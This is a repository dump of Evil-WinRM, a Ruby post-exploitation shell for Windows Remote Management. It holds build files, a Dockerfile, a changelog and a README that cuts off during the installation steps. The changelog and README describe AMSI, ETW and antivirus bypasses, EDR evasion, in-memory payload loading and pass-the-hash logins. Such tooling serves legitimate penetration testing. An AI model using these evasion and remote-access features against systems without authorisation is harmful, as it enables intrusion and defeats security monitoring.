├── Gemfile ├── bin └── evil-winrm ├── resources └── evil-winrm_logo.png ├── .rubocop.yml ├── .gitignore ├── .gitattributes ├── .github ├── pull_request_template.md └── workflows │ ├── dev.yml │ └── master.yml ├── .editorconfig ├── CONTRIBUTING.md ├── evil-winrm.gemspec ├── CODE_OF_CONDUCT.md ├── Dockerfile ├── CHANGELOG.md ├── LICENSE ├── README.md └── evil-winrm.rb /Gemfile: -------------------------------------------------------------------------------- 1 | # frozen_string_literal: true 2 | 3 | source 'https://rubygems.org' 4 | 5 | gemspec 6 | -------------------------------------------------------------------------------- /bin/evil-winrm: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require File.expand_path('../evil-winrm.rb',__dir__) 4 | -------------------------------------------------------------------------------- /resources/evil-winrm_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hackplayers/evil-winrm/HEAD/resources/evil-winrm_logo.png -------------------------------------------------------------------------------- /.rubocop.yml: -------------------------------------------------------------------------------- 1 | inherit_mode: 2 | merge: 3 | - Exclude 4 | AllCops: 5 | TargetRubyVersion: 2.3 6 | NewCops: enable 7 | SuggestExtensions: false 8 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store* 2 | ._* 3 | .Spotlight-V100 4 | .Trashes 5 | Gemfile.lock 6 | ehthumbs.db 7 | Thumbs.db 8 | desktop.ini 9 | .dropbox* 10 | .idea 11 | vendor/ 12 | .bundle/ 13 | .vscode/ 14 | *.gem 15 | *.kirbi 16 | *.ccache 17 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto eol=lf 3 | 4 | # Text files and source code 5 | *.txt text 6 | *.yml text 7 | *.rb text 8 | *.md text 9 | *.gemspec text 10 | 11 | # Executable binaries/packages 12 | *.deb binary 13 | *.xz binary 14 | 15 | # Binary image formats 16 | *.png binary 17 | -------------------------------------------------------------------------------- /.github/pull_request_template.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | #### Describe the purpose of the pull request 7 | 8 | 9 | -------------------------------------------------------------------------------- /.editorconfig: -------------------------------------------------------------------------------- 1 | #EditorConfig: http://editorconfig.org 2 | 3 | root = true 4 | 5 | [*] 6 | charset = utf-8 7 | end_of_line = lf 8 | insert_final_newline = true 9 | 10 | [*.gemspec] 11 | indent_style = space 12 | indent_size = 2 13 | trim_trailing_whitespace = true 14 | 15 | [*.rb] 16 | indent_style = space 17 | indent_size = 2 18 | trim_trailing_whitespace = true 19 | 20 | [*.md] 21 | indent_style = space 22 | indent_size = 4 23 | trim_trailing_whitespace = true 24 | 25 | [Gemfile] 26 | indent_style = space 27 | indent_size = 4 28 | 29 | [Dockerfile] 30 | indent_style = space 31 | indent_size = 4 32 | -------------------------------------------------------------------------------- /.github/workflows/dev.yml: -------------------------------------------------------------------------------- 1 | #Workflow for docker autobuild in dev branch 2 | 3 | name: 'Docker CI dev' 4 | 5 | on: 6 | push: 7 | branches: dev 8 | paths: 9 | - '**.md' 10 | - '**.rb' 11 | - 'Dockerfile' 12 | 13 | workflow_dispatch: 14 | 15 | jobs: 16 | docker: 17 | runs-on: ubuntu-latest 18 | steps: 19 | - name: Docker Hub login 20 | uses: docker/login-action@v1 21 | with: 22 | username: oscarakaelvis 23 | password: ${{ secrets.DOCKERHUB_TOKEN }} 24 | logout: true 25 | 26 | - name: Check out code 27 | uses: actions/checkout@v2 28 | 29 | - name: Build and push 30 | uses: docker/build-push-action@v2 31 | with: 32 | tags: oscarakaelvis/evil-winrm:beta 33 | context: . 34 | no-cache: true 35 | push: true 36 | -------------------------------------------------------------------------------- /.github/workflows/master.yml: -------------------------------------------------------------------------------- 1 | #Workflow for docker autobuild in master branch 2 | 3 | name: 'Docker CI master' 4 | 5 | on: 6 | push: 7 | branches: master 8 | paths: 9 | - '**.md' 10 | - '**.rb' 11 | - 'Dockerfile' 12 | 13 | workflow_dispatch: 14 | 15 | jobs: 16 | docker: 17 | runs-on: ubuntu-latest 18 | steps: 19 | - name: Docker Hub login 20 | uses: docker/login-action@v1 21 | with: 22 | username: oscarakaelvis 23 | password: ${{ secrets.DOCKERHUB_TOKEN }} 24 | logout: true 25 | 26 | - name: Check out code 27 | uses: actions/checkout@v2 28 | 29 | - name: Build and push 30 | uses: docker/build-push-action@v2 31 | with: 32 | tags: oscarakaelvis/evil-winrm:latest 33 | context: . 34 | no-cache: true 35 | push: true 36 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing 2 | 3 | Hello, thank you for your interest into contributing to this project. Your help is really appreciated. 4 | 5 | Please note we have a [Code of Conduct], please follow it in all your interactions with the project. 6 | 7 | --- 8 | 9 | ## Git Workflow Policy 10 | 11 | 1. Direct push to [Master] is not allowed. 12 | 2. Pull Requests to [Master] are not allowed. 13 | 3. Usually, commits and pull requests should be done on [Dev] branch using the content of our [Dev] branch to avoid missing features not released yet. If you have any doubt, don't hesitate to ask first. 14 | 4. Temporary branches may be existing for specific features, be pretty sure that the branch you are going to commit on is the right one. Ask first if you have any doubt. 15 | 5. Any branch will be finally merged to [Dev], there it will be reviewed and tested deeply before being merged to [Master]. 16 | 6. All merges from [Dev] to [Master] are a new `evil-winrm` release. This merges to [Master] will be performed and reviewed exclusively by the staff. 17 | 18 | --- 19 | 20 | [Code of Conduct]: CODE_OF_CONDUCT.md 21 | [Master]: https://github.com/Hackplayers/evil-winrm/tree/master 22 | [Dev]: https://github.com/Hackplayers/evil-winrm/tree/dev 23 | -------------------------------------------------------------------------------- /evil-winrm.gemspec: -------------------------------------------------------------------------------- 1 | # frozen_string_literal: true 2 | 3 | Gem::Specification.new do |spec| 4 | spec.name = 'evil-winrm' 5 | spec.version = '3.9' 6 | spec.license = 'LGPL-3.0' 7 | spec.authors = %w[CyberVaca OscarAkaElvis Jarilaos Arale61] 8 | spec.email = ['oscar.alfonso.diaz@gmail.com'] 9 | 10 | spec.summary = 'Evil-WinRM' 11 | spec.description = 'The ultimate WinRM shell for hacking/pentesting' 12 | spec.homepage = 'https://github.com/Hackplayers/evil-winrm#readme' 13 | spec.required_ruby_version = '>= 2.3' 14 | 15 | spec.metadata = { 16 | 'yard.run' => 'yard', 17 | 'changelog_uri' => 'https://github.com/Hackplayers/evil-winrm/blob/master/CHANGELOG.md', 18 | 'documentation_uri' => 'https://rubydoc.info/gems/evil-winrm', 19 | 'homepage_uri' => spec.homepage, 20 | 'source_code_uri' => 'https://github.com/Hackplayers/evil-winrm', 21 | 'rubygems_mfa_required' => 'true' 22 | } 23 | 24 | spec.files = Dir['bin/*'] + ['evil-winrm.rb', 'LICENSE'] 25 | spec.bindir = "bin" 26 | spec.executables = ["evil-winrm"] 27 | 28 | spec.add_dependency 'benchmark', '>= 0.1.0' 29 | spec.add_dependency 'csv', '>= 2.4.8' 30 | spec.add_dependency 'fileutils', '~> 1.0' 31 | spec.add_dependency 'logger', '~> 1.4', '>= 1.4.3' 32 | spec.add_dependency 'stringio', '~> 3.0' 33 | spec.add_dependency 'syslog', '>= 0.3.0' 34 | spec.add_dependency 'winrm', '~> 2.3', '>= 2.3.7' 35 | spec.add_dependency 'winrm-fs', '~> 1.3', '>= 1.3.2' 36 | 37 | spec.add_development_dependency 'bundler', '~> 2.0' 38 | 39 | spec.post_install_message = 'Happy hacking! :)' 40 | end 41 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as 6 | contributors and maintainers pledge to making participation in our project and 7 | our community a harassment-free experience for everyone, regardless of age, body 8 | size, disability, ethnicity, sex characteristics, gender identity and expression, 9 | level of experience, education, socio-economic status, nationality, personal 10 | appearance, race, religion, or sexual identity and orientation. 11 | 12 | ## Our Standards 13 | 14 | Examples of behavior that contributes to creating a positive environment 15 | include: 16 | 17 | * Using welcoming and inclusive language 18 | * Being respectful of differing viewpoints and experiences 19 | * Gracefully accepting constructive criticism 20 | * Focusing on what is best for the community 21 | * Showing empathy towards other community members 22 | 23 | Examples of unacceptable behavior by participants include: 24 | 25 | * The use of sexualized language or imagery and unwelcome sexual attention or 26 | advances 27 | * Trolling, insulting/derogatory comments, and personal or political attacks 28 | * Public or private harassment 29 | * Publishing others' private information, such as a physical or electronic 30 | address, without explicit permission 31 | * Other conduct which could reasonably be considered inappropriate in a 32 | professional setting 33 | 34 | ## Our Responsibilities 35 | 36 | Project maintainers are responsible for clarifying the standards of acceptable 37 | behavior and are expected to take appropriate and fair corrective action in 38 | response to any instances of unacceptable behavior. 39 | 40 | Project maintainers have the right and responsibility to remove, edit, or 41 | reject comments, commits, code, wiki edits, issues, and other contributions 42 | that are not aligned to this Code of Conduct, or to ban temporarily or 43 | permanently any contributor for other behaviors that they deem inappropriate, 44 | threatening, offensive, or harmful. 45 | 46 | ## Scope 47 | 48 | This Code of Conduct applies both within project spaces and in public spaces 49 | when an individual is representing the project or its community. Examples of 50 | representing a project or community include using an official project e-mail 51 | address, posting via an official social media account, or acting as an appointed 52 | representative at an online or offline event. Representation of a project may be 53 | further defined and clarified by project maintainers. 54 | 55 | ## Enforcement 56 | 57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 58 | reported by contacting the project team at oscar.alfonso.diaz@gmail.com. All 59 | complaints will be reviewed and investigated and will result in a response that 60 | is deemed necessary and appropriate to the circumstances. The project team is 61 | obligated to maintain confidentiality with regard to the reporter of an incident. 62 | Further details of specific enforcement policies may be posted separately. 63 | 64 | Project maintainers who do not follow or enforce the Code of Conduct in good 65 | faith may face temporary or permanent repercussions as determined by other 66 | members of the project's leadership. 67 | 68 | ## Attribution 69 | 70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, 71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html 72 | 73 | [homepage]: https://www.contributor-covenant.org 74 | 75 | For answers to common questions about this code of conduct, see 76 | https://www.contributor-covenant.org/faq 77 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | # Evil-WinRM Dockerfile 2 | 3 | # Base image 4 | FROM alpine:3.20.3 AS final 5 | FROM alpine:3.20.3 AS build 6 | 7 | # Credits & Data 8 | LABEL \ 9 | name="Evil-WinRM" \ 10 | author="CyberVaca " \ 11 | maintainer="OscarAkaElvis " \ 12 | description="The ultimate WinRM shell for hacking/pentesting" 13 | 14 | #Env vars 15 | ENV EVILWINRM_URL="https://github.com/Hackplayers/evil-winrm.git" 16 | 17 | # Install dependencies for building ruby with readline and openssl support 18 | RUN apk --no-cache add cmake \ 19 | clang \ 20 | clang-dev \ 21 | make \ 22 | gcc \ 23 | g++ \ 24 | libc-dev \ 25 | linux-headers \ 26 | readline \ 27 | readline-dev \ 28 | yaml \ 29 | yaml-dev \ 30 | libffi \ 31 | libffi-dev \ 32 | zlib \ 33 | zlib-dev \ 34 | openssl-dev \ 35 | openssl \ 36 | bash \ 37 | git 38 | 39 | # Make the ruby path available 40 | ENV PATH=$PATH:/opt/rubies/ruby-3.2.2/bin 41 | 42 | # Get ruby-install for building ruby 3.2.2 43 | RUN cd /tmp/ && \ 44 | wget -O /tmp/ruby-install-0.8.1.tar.gz https://github.com/postmodern/ruby-install/archive/v0.8.1.tar.gz && \ 45 | tar -xzvf ruby-install-0.8.1.tar.gz && \ 46 | cd ruby-install-0.8.1/ && make install && \ 47 | ruby-install -c ruby 3.2.2 -- --with-readline-dir=/usr/include/readline --with-openssl-dir=/usr/include/openssl --disable-install-rdoc 48 | 49 | # Set directory for the deploy of the application 50 | WORKDIR /opt 51 | 52 | # Evil-WinRM install method 1 (only one method can be used, other must be commented) 53 | # Install Evil-WinRM (DockerHub automated build process) 54 | RUN mkdir evil-winrm 55 | COPY . /opt/evil-winrm 56 | 57 | # Evil-WinRM install method 2 (only one method can be used, other must be commented) 58 | # Install Evil-WinRM (manual image build) 59 | # Uncomment git clone line and one of the ENV vars to select branch (master->latest, dev->beta) 60 | #ENV BRANCH="master" 61 | #ENV BRANCH="dev" 62 | #RUN git clone -b ${BRANCH} ${EVILWINRM_URL} 63 | 64 | # Install Evil-WinRM ruby dependencies 65 | RUN gem install benchmark \ 66 | csv \ 67 | fileutils \ 68 | logger \ 69 | stringio \ 70 | syslog \ 71 | winrm \ 72 | winrm-fs 73 | 74 | # Clean and remove useless files 75 | RUN rm -rf /opt/evil-winrm/resources > /dev/null 2>&1 && \ 76 | rm -rf /opt/evil-winrm/.github > /dev/null 2>&1 && \ 77 | rm -rf /opt/evil-winrm/CONTRIBUTING.md > /dev/null 2>&1 && \ 78 | rm -rf /opt/evil-winrm/CODE_OF_CONDUCT.md > /dev/null 2>&1 && \ 79 | rm -rf /opt/evil-winrm/Dockerfile > /dev/null 2>&1 && \ 80 | rm -rf /opt/evil-winrm/Gemfile* > /dev/null 2>&1 && \ 81 | rm -rf /opt/evil-winrm/evil-winrm.gemspec > /dev/null 2>&1 && \ 82 | rm -rf /opt/evil-winrm/.rubocop.yml > /dev/null 2>&1 && \ 83 | rm -rf /opt/evil-winrm/.editorconfig > /dev/null 2>&1 && \ 84 | rm -rf /opt/evil-winrm/.gitignore > /dev/null 2>&1 && \ 85 | rm -rf /opt/evil-winrm/.gitattributes > /dev/null 2>&1 && \ 86 | rm -rf /opt/evil-winrm/bin > /dev/null 2>&1 87 | 88 | # Rename script name 89 | RUN mv /opt/evil-winrm/evil-winrm.rb /opt/evil-winrm/evil-winrm && \ 90 | chmod +x /opt/evil-winrm/evil-winrm 91 | 92 | # Base final image 93 | FROM final 94 | 95 | # Install readline and other dependencies 96 | RUN apk --no-cache add \ 97 | readline \ 98 | yaml \ 99 | krb5-libs \ 100 | libffi 101 | 102 | # Make the ruby and Evil-WinRM paths available 103 | ENV PATH=$PATH:/opt/rubies/ruby-3.2.2/bin:/opt/evil-winrm 104 | 105 | # Copy built stuff from build image 106 | COPY --from=build /opt /opt 107 | 108 | # Create volume for powershell scripts 109 | RUN mkdir /ps1_scripts 110 | VOLUME /ps1_scripts 111 | 112 | # Create volume for executable files 113 | RUN mkdir /exe_files 114 | VOLUME /exe_files 115 | 116 | # Create volume for data (upload/download) 117 | RUN mkdir /data 118 | VOLUME /data 119 | 120 | # set current working dir 121 | WORKDIR /data 122 | 123 | # Start command (launching Evil-WinRM) 124 | ENTRYPOINT ["evil-winrm"] 125 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | ### 3.9 2 | - Quick fix of a broken dependency for Ruby gem (syslog) 3 | 4 | ### 3.8 5 | - Added support for Kerberos ticket files (ccache and kirbi formats) with -K parameter, including automatic format detection/conversion and optional reverse DNS lookup for FQDN 6 | - Added persistent command history per user/host (stored in ~/.evil-winrm/history/) 7 | - Fixed autocomplete logic for upload/download commands and improved relative path handling with file validation 8 | - Added clear/cls commands and Ctrl+L support for clearing screen 9 | - Updated logo 10 | - Fixed minor problem in Dockerfile, updated to new alpine version 11 | - Added dependency to Dockerfile to make Kerberos to work (thanks ArchiMoebius) 12 | - Added dependencies to Dockerfile and gemspec file to make it compatible with newer Ruby versions 13 | - Fix error using Kerberos and SSL at the same time (thanks birk0) 14 | 15 | ### 3.7 16 | - Fixed menu command to avoid being detected as malware 17 | - Improved EDR evasion randomizing powershell function names and variables 18 | - Added progress bar for AMSI bypass 19 | 20 | ### 3.6 21 | - Improvements of paths parsing 22 | - Fixed bug downloading files without extension 23 | - Replaced deprecated File.exists by File.exist function to avoid errors on newer Ruby versions 24 | - Added user-agent option (Thanks gmkbenjamin) 25 | - AMSI bypass refactor 26 | - ETW bypasss added 27 | - Fixed Donut-Loader feature 28 | 29 | ### 3.5 30 | - Improvements on powershell functions loading 31 | - Improvements on gemspec file and in ruby code using Rubocop (Thanks noraj) 32 | - Fixed issues with download and upload commands 33 | - Added support for simple wildcard usage in upload and download commands 34 | - Fixed non-controlled error on wrong certificates path when SSL enabled 35 | - Docker image improved to support remote path completion 36 | 37 | ### 3.4 38 | - Added CI files to be used in Github actions for Docker automated building 39 | - Improvements on dynamic AMSI bypass 40 | - Added gemspec file to repo for gem building 41 | 42 | ### 3.3 43 | - Fixed missing output messages for Invoke-Binary 44 | - Extracted AMSI bypass from menu to avoid menu problems due to M$ AV signatures 45 | - Dynamic AMSI bypass implemented to avoid AV signatures 46 | 47 | ### 3.2 48 | - Fixed minor duplicated code problem 49 | - Dockerfile improvements 50 | - AMSI bypass update 51 | 52 | ### 3.1 53 | - Version released just to quick fix ruby dependencies on gem 54 | 55 | ### 3.0 56 | - Remote files/directories autocomplete feature 57 | - Added option to log commands and outputs to a log file (Thanks to Borch Cañavate) 58 | 59 | ### 2.4 60 | - File permission access error now handled in exception to avoid losing connection 61 | - Improvements on bundler installation method 62 | - Added spn (Service Principal Names) option param for kerberos auth to set some different than default HTTP 63 | - Fixed prompt colors (ANSI) 64 | 65 | ### 2.3 66 | - Fixed Invoke-Binary arguments 67 | - Service function improved, now show privileges over the services 68 | 69 | ### 2.2 70 | - Added progress bar for file uploads/downloads 71 | - New ascii art on menu 72 | - Name of Dll loader refactored 73 | - Help added to Invoke-Binary 74 | - Fixed Invoke-Binary to accept any number of arguments separated by commas 75 | 76 | ### 2.1 77 | - Fixed required params for certificates auth 78 | - Removed trailing spaces for better visualization 79 | - Added command line option to disable colors 80 | - Improved Windows compatibility 81 | - Trap capturing to avoid accidental shell exit on Ctrl+C 82 | 83 | ### 2.0 84 | - Fix GSSAPI error 85 | - Docker support added 86 | 87 | ### 1.9 88 | - Added AMSI bypass 89 | - Fix the ps1 load with large size 90 | - Kerberos auth support 91 | - Improve upload/download functionality 92 | 93 | ### 1.8 94 | - Added pass-the-hash feature 95 | - Added bundler installation method 96 | 97 | ### 1.7 98 | - Added x64 compatibility to use Donut payloads 99 | 100 | ### 1.6 101 | - Added SSL and certificates support 102 | - Upload/download messages improved 103 | - Updated documentation 104 | - Removed scripts and executables dir as mandatory arguments 105 | - Added logo 106 | 107 | ### 1.5 108 | - Refactor to class 109 | - Fixed upload/download error 110 | - Added help arguments for connection 111 | 112 | ### 1.4 113 | - Small fixes 114 | 115 | ### 1.3 116 | - Added colors to shell prompt 117 | - Added images to documentation 118 | 119 | ### 1.2 120 | - Added some validations 121 | - Added badges to documentation 122 | 123 | ### 1.1 124 | - Translation to english 125 | - Added first documentation 126 | - Added colors for messages 127 | - First ruby gem created 128 | 129 | ### 1.0 130 | - Initial commit 131 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU LESSER GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | 9 | This version of the GNU Lesser General Public License incorporates 10 | the terms and conditions of version 3 of the GNU General Public 11 | License, supplemented by the additional permissions listed below. 12 | 13 | 0. Additional Definitions. 14 | 15 | As used herein, "this License" refers to version 3 of the GNU Lesser 16 | General Public License, and the "GNU GPL" refers to version 3 of the GNU 17 | General Public License. 18 | 19 | "The Library" refers to a covered work governed by this License, 20 | other than an Application or a Combined Work as defined below. 21 | 22 | An "Application" is any work that makes use of an interface provided 23 | by the Library, but which is not otherwise based on the Library. 24 | Defining a subclass of a class defined by the Library is deemed a mode 25 | of using an interface provided by the Library. 26 | 27 | A "Combined Work" is a work produced by combining or linking an 28 | Application with the Library. The particular version of the Library 29 | with which the Combined Work was made is also called the "Linked 30 | Version". 31 | 32 | The "Minimal Corresponding Source" for a Combined Work means the 33 | Corresponding Source for the Combined Work, excluding any source code 34 | for portions of the Combined Work that, considered in isolation, are 35 | based on the Application, and not on the Linked Version. 36 | 37 | The "Corresponding Application Code" for a Combined Work means the 38 | object code and/or source code for the Application, including any data 39 | and utility programs needed for reproducing the Combined Work from the 40 | Application, but excluding the System Libraries of the Combined Work. 41 | 42 | 1. Exception to Section 3 of the GNU GPL. 43 | 44 | You may convey a covered work under sections 3 and 4 of this License 45 | without being bound by section 3 of the GNU GPL. 46 | 47 | 2. Conveying Modified Versions. 48 | 49 | If you modify a copy of the Library, and, in your modifications, a 50 | facility refers to a function or data to be supplied by an Application 51 | that uses the facility (other than as an argument passed when the 52 | facility is invoked), then you may convey a copy of the modified 53 | version: 54 | 55 | a) under this License, provided that you make a good faith effort to 56 | ensure that, in the event an Application does not supply the 57 | function or data, the facility still operates, and performs 58 | whatever part of its purpose remains meaningful, or 59 | 60 | b) under the GNU GPL, with none of the additional permissions of 61 | this License applicable to that copy. 62 | 63 | 3. Object Code Incorporating Material from Library Header Files. 64 | 65 | The object code form of an Application may incorporate material from 66 | a header file that is part of the Library. You may convey such object 67 | code under terms of your choice, provided that, if the incorporated 68 | material is not limited to numerical parameters, data structure 69 | layouts and accessors, or small macros, inline functions and templates 70 | (ten or fewer lines in length), you do both of the following: 71 | 72 | a) Give prominent notice with each copy of the object code that the 73 | Library is used in it and that the Library and its use are 74 | covered by this License. 75 | 76 | b) Accompany the object code with a copy of the GNU GPL and this license 77 | document. 78 | 79 | 4. Combined Works. 80 | 81 | You may convey a Combined Work under terms of your choice that, 82 | taken together, effectively do not restrict modification of the 83 | portions of the Library contained in the Combined Work and reverse 84 | engineering for debugging such modifications, if you also do each of 85 | the following: 86 | 87 | a) Give prominent notice with each copy of the Combined Work that 88 | the Library is used in it and that the Library and its use are 89 | covered by this License. 90 | 91 | b) Accompany the Combined Work with a copy of the GNU GPL and this license 92 | document. 93 | 94 | c) For a Combined Work that displays copyright notices during 95 | execution, include the copyright notice for the Library among 96 | these notices, as well as a reference directing the user to the 97 | copies of the GNU GPL and this license document. 98 | 99 | d) Do one of the following: 100 | 101 | 0) Convey the Minimal Corresponding Source under the terms of this 102 | License, and the Corresponding Application Code in a form 103 | suitable for, and under terms that permit, the user to 104 | recombine or relink the Application with a modified version of 105 | the Linked Version to produce a modified Combined Work, in the 106 | manner specified by section 6 of the GNU GPL for conveying 107 | Corresponding Source. 108 | 109 | 1) Use a suitable shared library mechanism for linking with the 110 | Library. A suitable mechanism is one that (a) uses at run time 111 | a copy of the Library already present on the user's computer 112 | system, and (b) will operate properly with a modified version 113 | of the Library that is interface-compatible with the Linked 114 | Version. 115 | 116 | e) Provide Installation Information, but only if you would otherwise 117 | be required to provide such information under section 6 of the 118 | GNU GPL, and only to the extent that such information is 119 | necessary to install and execute a modified version of the 120 | Combined Work produced by recombining or relinking the 121 | Application with a modified version of the Linked Version. (If 122 | you use option 4d0, the Installation Information must accompany 123 | the Minimal Corresponding Source and Corresponding Application 124 | Code. If you use option 4d1, you must provide the Installation 125 | Information in the manner specified by section 6 of the GNU GPL 126 | for conveying Corresponding Source.) 127 | 128 | 5. Combined Libraries. 129 | 130 | You may place library facilities that are a work based on the 131 | Library side by side in a single library together with other library 132 | facilities that are not Applications and are not covered by this 133 | License, and convey such a combined library under terms of your 134 | choice, if you do both of the following: 135 | 136 | a) Accompany the combined library with a copy of the same work based 137 | on the Library, uncombined with any other library facilities, 138 | conveyed under the terms of this License. 139 | 140 | b) Give prominent notice with the combined library that part of it 141 | is a work based on the Library, and explaining where to find the 142 | accompanying uncombined form of the same work. 143 | 144 | 6. Revised Versions of the GNU Lesser General Public License. 145 | 146 | The Free Software Foundation may publish revised and/or new versions 147 | of the GNU Lesser General Public License from time to time. Such new 148 | versions will be similar in spirit to the present version, but may 149 | differ in detail to address new problems or concerns. 150 | 151 | Each version is given a distinguishing version number. If the 152 | Library as you received it specifies that a certain numbered version 153 | of the GNU Lesser General Public License "or any later version" 154 | applies to it, you have the option of following the terms and 155 | conditions either of that published version or of any later version 156 | published by the Free Software Foundation. If the Library as you 157 | received it does not specify a version number of the GNU Lesser 158 | General Public License, you may choose any version of the GNU Lesser 159 | General Public License ever published by the Free Software Foundation. 160 | 161 | If the Library as you received it specifies that a proxy can decide 162 | whether future versions of the GNU Lesser General Public License shall 163 | apply, that proxy's public statement of acceptance of any version is 164 | permanent authorization for you to choose that version for the 165 | Library. 166 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Evil-WinRM [![Version-shield]](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/evil-winrm.rb) [![Ruby2.3-shield]](https://www.ruby-lang.org/en/news/2015/12/25/ruby-2-3-0-released/) [![Gem-Version]](https://rubygems.org/gems/evil-winrm) [![License-shield]](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/LICENSE) [![Docker-shield]](https://hub.docker.com/r/oscarakaelvis/evil-winrm/) 2 | The ultimate WinRM shell for hacking/pentesting 3 | 4 | ![Banner](https://raw.githubusercontent.com/Hackplayers/evil-winrm/dev/resources/evil-winrm_logo.png) 5 | 6 | ## Description & Purpose 7 | This shell is the ultimate WinRM shell for hacking/pentesting. 8 | 9 | WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol 10 | that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating 11 | Systems in order to make life easier to system administrators. 12 | 13 | This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only 14 | if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting 15 | phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate 16 | purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff. 17 | 18 | It is based mainly in the WinRM Ruby library which changed its way to work since its version 2.0. Now instead of using WinRM 19 | protocol, it is using PSRP (Powershell Remoting Protocol) for initializing runspace pools as well as creating and processing pipelines. 20 | 21 | ## Features 22 | - Compatible to Linux and Windows client systems 23 | - Load in memory Powershell scripts 24 | - Load in memory dll files bypassing some AVs 25 | - Load in memory C# (C Sharp) assemblies bypassing some AVs 26 | - Load x64 payloads generated with awesome [donut] technique 27 | - Dynamic AMSI Bypass to avoid AV signatures 28 | - Pass-the-hash support 29 | - Kerberos auth support including also ccache and kirbi files 30 | - SSL and certificates support 31 | - Upload and download files showing progress bar 32 | - List remote machine services without privileges 33 | - Command History 34 | - WinRM command completion 35 | - Local files/directories completion 36 | - Remote path (files/directories) completion (can be disabled optionally) 37 | - Colorization on prompt and output messages (can be disabled optionally) 38 | - Optional logging feature 39 | - Docker support (prebuilt images available at [Dockerhub]) 40 | - Trap capturing to avoid accidental shell exit on Ctrl+C 41 | - Customizable user-agent using legitimate Windows default one 42 | - ETW (Event Tracing for Windows) bypass 43 | 44 | ## Help 45 | ``` 46 | Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-a USERAGENT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [-K TICKET_FILE] [--spn SPN_PREFIX] [-l] 47 | -S, --ssl Enable ssl 48 | -c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate 49 | -k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate 50 | -r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com } 51 | -K, --ccache TICKET_FILE Path to Kerberos ticket file (ccache or kirbi format, auto-detected) 52 | -s, --scripts PS_SCRIPTS_PATH Powershell scripts local path 53 | --spn SPN_PREFIX SPN prefix for Kerberos auth (default HTTP) 54 | -e, --executables EXES_PATH C# executables local path 55 | -i, --ip IP Remote host IP or hostname. FQDN for Kerberos auth (required) 56 | -U, --url URL Remote url endpoint (default /wsman) 57 | -u, --user USER Username (required if not using kerberos) 58 | -p, --password PASS Password 59 | -H, --hash HASH NTHash 60 | -P, --port PORT Remote host port (default 5985) 61 | -a, --user-agent Specify connection user-agent (default Microsoft WinRM Client) 62 | -V, --version Show version 63 | -n, --no-colors Disable colors 64 | -N, --no-rpath-completion Disable remote path completion 65 | -l, --log Log the WinRM session 66 | -h, --help Display this help message 67 | 68 | ``` 69 | 70 | ## Requirements 71 | Ruby 2.3 or higher is needed. Some ruby gems are needed as well: `winrm >=2.3.7`, `winrm-fs >=1.3.2`, `stringio >=0.0.2`, `logger >= 1.4.3`, `fileutils >= 0.7.2`. 72 | Depending of your installation method (4 availables) the installation of them could be required to be done manually. 73 | 74 | Another important requirement only used for Kerberos auth is to install the Kerberos package used for network authentication. 75 | For some Linux like Debian based (Kali, Parrot, etc.) it is called `krb5-user`. For BlackArch it is called `krb5` and probably it could be called in a different way for other Linux distributions. 76 | 77 | The remote path completion feature will work only if your ruby was compiled enabling the `--with-readline-dir` flag. This is enabled by default in ruby included on some Linux distributions but not in all. Check [the section below](#Remote-path-completion) for more info. 78 | 79 | ## Installation & Quick Start (4 methods) 80 | 81 | ### Method 1. Installation directly as ruby gem (dependencies will be installed automatically on your system) 82 | - Step 1. Install it (it will install automatically dependencies): ```gem install evil-winrm``` 83 | - Step 2. Ready. Just launch it! 84 | ``` 85 | evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' 86 | ``` 87 | 88 | ### Method 2. Git clone and install dependencies on your system manually 89 | - Step 1. Install dependencies manually: `sudo gem install winrm winrm-fs stringio logger fileutils` 90 | - Step 2. Clone the repo: `git clone https://github.com/Hackplayers/evil-winrm.git` 91 | - Step 3. Ready. Just launch it! 92 | ``` 93 | cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' 94 | ``` 95 | 96 | ### Method 3. Using bundler (dependencies will not be installed on your system, 